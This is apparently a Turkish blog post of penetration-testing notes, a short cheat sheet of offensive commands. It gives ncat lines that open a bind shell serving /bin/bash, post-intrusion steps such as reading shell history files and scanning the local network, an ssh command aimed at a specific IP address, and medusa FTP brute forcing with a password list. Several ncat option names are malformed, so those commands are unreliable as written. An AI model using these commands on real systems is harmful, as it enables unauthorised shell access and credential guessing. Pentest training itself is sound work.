25 Temmuz 2011 Pazartesi

Pentest in Practice - IX: Pratik Bilgiler

  • # ncat -l 1900 --keep-open --send-only --ssh-exe /bin/bash &
  • Bir linux sisteme girildikten sonra yapılacak araştırmalar:
    • 777 izinli dosyalara bakılır
    • .***_history (.bash_history gibi) dosyalarına bakılır
    • -netstat -rn (routing table)
    • /sbin/arp -an => network taraması
  • ssh -l <user> 95.173.123.112 -p <port|22>
  • FTP port açıksa:
    • Hemen anonymous ftp açık olup olmadığına bakılır.
    • En çok kullanılan ftp user/pwd çiftleri ile brute force denemeleri yapılır.
    • İyi bir pwd list olarak backtrack içindeki /pentest/passwords/john/password.lst kullanılabilir.
    • medusa ile ftp brute force => # medusa -M ftp -h <URL> -U <user-list> -P <pwd-list>
  • Nessus'un raporladığı açıklıklarla ilgili önce google'da "jboss metasploit" tarzı bir arama yap.
  • Karşı tarafta bir bind_tcp shell açtığımızı düşünelim. 
    • Eğer varsa nc (netcat) ile bir portu dinlemeye açıp oraya bağlanabiliriz.
    • Yoksa, ncat, ftp, tftp vs "ne açık?" taraması yapalım.
    • ncat -l 6666 --keep-open --udp --send_only --ssh.exe /bin/bash &

Hiç yorum yok:

Yorum Gönder

Web Uygulama Sızma Testleri İçin Kontrol Listeleri - V

Checklist for Web App Pentesting - V 6. Veri Denetimi (Data Validation) Testleri 6.1 Girdi Denetimi Bütün girdiler denetlenmelidir....